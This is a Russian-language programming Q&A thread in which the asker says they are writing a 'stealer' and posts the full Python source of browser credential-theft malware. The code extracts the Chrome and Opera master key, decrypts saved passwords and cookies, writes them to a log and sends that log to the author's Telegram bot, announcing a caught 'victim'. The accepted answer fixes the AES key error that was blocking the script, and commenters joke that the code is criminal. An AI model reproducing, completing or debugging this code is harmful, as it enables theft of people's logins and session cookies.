# Object type <class 'list'> cannot be passed to C code

Tags: python

Пишу стиллак, подбирая кусочки кода с проектов гитхаба.
Код который у меня получился:

```
try:
    import time
    import telegram
    import shutil
    import json
    import random
    from base64 import b64decode
    from win32crypt import CryptUnprotectData
    from Crypto.Cipher import AES
    import os
    import sqlite3
    import win32api
    import datetime
    import requests
    import ctypes
    import string
    import subprocess
    from bs4 import BeautifulSoup
    import sys
    import urllib.request
    import re
    import glob
    from ctypes import wintypes
    from json import loads as json_loads, load
    from string import ascii_lowercase
    from sqlite3 import connect as sql_connect
    from Crypto import Random
except Exception as e:
    print(e)
    pass



user_id = *скрыто*
token = *скрыто*
today = datetime.datetime.today()
password_file = "log" + today.strftime("%Y-%m-%d-%H.%M.%S") + ".txt"
read_files = glob.glob("*.txt")

sendpath = 'C:\Temp'
url = "https://ifconfig.me/ip"
uf = urllib.request.urlopen(url)
html1 = uf.read()
html = re.sub("[b'()]", "", html1.decode('utf-8'))
passtext = "######################################" + "\n" + "########## Passwords of" + str(html) + " #######" + "\n" + "######################################" + "\n" + "\n"

LocalAppData = os.environ['LocalAppData'] + '\\'
AppData = os.environ['AppData'] + '\\'
FileName = 116444736000000000
NanoSeconds = 10000000



class DATA_BLOB(ctypes.Structure):
    _fields_ = [
        ('cbData', wintypes.DWORD),
        ('pbData', ctypes.POINTER(ctypes.c_char))
    ]







subprocess.Popen('@chcp 65001 1>nul', shell=True)



def GetBrowsers():
    Browsers = []

    for Browser in BrowsersPath:
        if os.path.exists(Browser):
            Browsers.append(Browser)

    return Browsers



def DecryptPayload(cipher, payload):
    return cipher.decrypt(cipher, payload)



def GenerateCipher(aes_key, iv):
        aes_key = [random.choice(string.ascii_lowercase) for i in range(random.randint(16, 16))]
        iv= b'0123456789abcdef'
        return AES.new(aes_key, AES.MODE_CBC, iv=iv)


def GetMasterKey(browserPath):
    fail = True

    for i in range(4):
        path = browserPath + '\\..' * i + '\\Local State'

        if os.path.exists(path):
            fail = False
            break

    if fail:
        return None

    with open(path, 'r', encoding='utf-8') as f:
        local_state = f.read()
        local_state = json_loads(local_state)

    master_key = b64decode(local_state['os_crypt']['encrypted_key'])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key)
    return master_key



def DecryptValue(buff, master_key=None):
    starts = buff.decode(encoding='utf-8', errors='ignore')[:3]
    if starts == 'v10' or starts == 'v11':
        iv = buff[3:15]
        payload = buff[15:]
        cipher = GenerateCipher(master_key, iv)
        decrypted_pass = DecryptPayload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass
    else:
        decrypted_pass = CryptUnprotectData(buff)
        return decrypted_pass



def FetchDataBase(target_db, sql=''):
    if not os.path.exists(target_db):
        return []

    tmpDB = os.getenv('TEMP') + '\info_' + ''.join(random.choice(ascii_lowercase) for i in range(random.randint(10, 20))) + '.db'
    shutil.copy2(target_db, tmpDB)
    conn = sql_connect(tmpDB)
    cursor = conn.cursor()
    cursor.execute(sql)
    data = cursor.fetchall()
    cursor.close()
    conn.close()

    try:
        os.remove(tmpDB)
    except:
        pass

    return data



BrowsersPath = (
    LocalAppData + 'Google\\Chrome\\User Data\\Default',
    AppData + 'Opera Software\\Opera Stable'
)



def GetPasswords():
    global credentials
    credentials = []
    ptext = "######################################" + "\n" + "########## Passwords of" + str(html) + " #######" + "\n" + "######################################" + "\n" + "\n"
    for browser in GetBrowsers():
        master_key = GetMasterKey(browser)
        database = FetchDataBase(browser + '\\Login Data', 'SELECT action_url, username_value, password_value FROM logins')

        for row in database:
            password = {
                'hostname': row[0],
                'login': row[1],
                'password': DecryptValue(row[2], master_key)
            }
            ptext += f'{row[0]}|{row[1]}|{row[2]}\n' + '\n'
            with open("p_log.txt", "w", encoding="utf-8") as f:
                f.write(ptext)
            credentials.append(password)

    return credentials



def GetCookies():
    global credentials
    credentials = []
    ctext = "######################################" + "\n" + "########## Cookies of" + str(html) + " #######" + "\n" + "######################################" + "\n" + "\n"
    for browser in GetBrowsers():
        master_key = GetMasterKey(browser)
        database = FetchDataBase(browser + '\\Cookies', 'SELECT * FROM cookies')

        for row in database:
            cookie = {
                'value': DecryptValue(row[12], master_key),
                'hostname': row[1],
                'name': row[2],
                'path': row[4],
                'expires': row[5],
                'secure': bool(row[6])
            }
            ctext += f'{value}|{hostname}|{name}|{path}|{expires}|{secure}\n' + '\n'
            with open("c_log.txt", "w", encoding="utf-8") as f:
                f.write(ctext)
            credentials.append(cookie)

    return credentials



def merge_logs():
    try:
        with open(password_file, "wb") as outfile:
            for f in read_files:
                with open(f, "rb") as infile:
                    outfile.write(infile.read() + b'\n')
    except Exception as e:
        print("ERROR in merge_logs() func: " + repr(e))
        pass



def send_txt():
    try:
        f = open(password_file, 'rb')
        bot.sendDocument(user_id, document=f)
        bot.send_message(user_id, text="Жертва попалась на Money Mod Stealer (" + str(html) + ")!")
        print("***Пароли были отправлены через бота")
    except Exception as e:
        print("ERROR in send_txt() func: " + repr(e))
        pass



def logo():
    try:
        print(" /$$      /$$                                         /$$      /$$                 /$$  /$$$$$$   /$$                         /$$                    " + "\n" + "| $$$    /$$$                                        | $$$    /$$$                | $$ /$$__  $$ | $$                        | $$                    " + "\n" + "| $$$$  /$$$$  /$$$$$$  /$$$$$$$   /$$$$$$  /$$   /$$| $$$$  /$$$$  /$$$$$$   /$$$$$$$| $$  \__//$$$$$$    /$$$$$$   /$$$$$$ | $$  /$$$$$$   /$$$$$$ " + "\n" + "| $$ $$/$$ $$ /$$__  $$| $$__  $$ /$$__  $$| $$  | $$| $$ $$/$$ $$ /$$__  $$ /$$__  $$|  $$$$$$|_  $$_/   /$$__  $$ |____  $$| $$ /$$__  $$ /$$__  $$" + "\n" + "| $$  $$$| $$| $$  \ $$| $$  \ $$| $$$$$$$$| $$  | $$| $$  $$$| $$| $$  \ $$| $$  | $$ \____  $$ | $$    | $$$$$$$$  /$$$$$$$| $$| $$$$$$$$| $$  \__/" + "\n" + "| $$\  $ | $$| $$  | $$| $$  | $$| $$_____/| $$  | $$| $$\  $ | $$| $$  | $$| $$  | $$ /$$  \ $$ | $$ /$$| $$_____/ /$$__  $$| $$| $$_____/| $$      " + "\n" + "| $$ \/  | $$|  $$$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$| $$ \/  | $$|  $$$$$$/|  $$$$$$$|  $$$$$$/ |  $$$$/|  $$$$$$$|  $$$$$$$| $$|  $$$$$$$| $$      " + "\n" + "|__/     |__/ \______/ |__/  |__/ \_______/ \____  $$|__/     |__/ \______/  \_______/ \______/   \___/   \_______/ \_______/|__/ \_______/|__/      " + "\n" + "                                            /$$  | $$                                                                                                " + "\n" + "                                           |  $$$$$$/                                                                                                " + "\n" + "                                            \______/                                                                                                 ")
        time.sleep(10)
    except Exception as e:
        print("ERROR in logo() func: " + repr(e))
        pass




def main():
    try:
        GetBrowsers()
        GetPasswords()
        GetCookies()
        merge_logs()
        send_txt()
    except Exception as e:
        print(e)
        pass


if __name__ == '__main__':
    main()
    print("Успешно!")
```

Запустив код, я получил ошибку:

```
Object type <class 'list'> cannot be passed to C code
```

Почему не пишет строку я так и не понял, но методом тыка понял, что проблема в функции GenerateCipher.

Comment: Пожалуйста, приведите полный текст ошибки, так будет легче решить Вашу проблему

Answer (score 2, accepted):

Примеры в документации выглядят так:

```
from Crypto.Cipher import AES

key = b'Sixteen byte key'
cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
```

А у вас код такой:

```
aes_key = [random.choice(string.ascii_lowercase) for i in range(random.randint(16, 16))]
iv= b'0123456789abcdef'
return AES.new(aes_key, AES.MODE_CBC, iv=iv)
```

Т.е. `key` должен быть байтами, а у вас там список. Что за ключ `iv=` непонятно, в документации такого не видно. Так что, наверное, `aes_key` нужно генерить так:

```
aes_key = ''.join([random.choice(string.ascii_lowercase) for i in range(random.randint(16, 16))]).encode()
```

Ну, либо у вас ключ в переменной `iv` лежит и надо использовать её как ключ, я не знаю какая у вас задумка.

Comment: Интересно, в чем смысл `random.randint(16, 16)`? :D

Comment: @gil9red Я так внимательно в код не всматривался ))  Смешно. Думаю, там всё надо переписывать нафик

Comment: @CrazyElf, если всматриваться в код, то можно 273 статью УК РФ увидеть

Comment: а понял, спасибо, это я просто с кривого исходника достал

Comment: @Zhihar, :D это не моё мне подкинули)))

Comment: @CrazyElf, да не, вроде живое всё, я просто пайтон два года назад учил, уже не помню ничего)

Comment: ну вы бы контактик оставили бы, чтобы отдел К не очень напрягать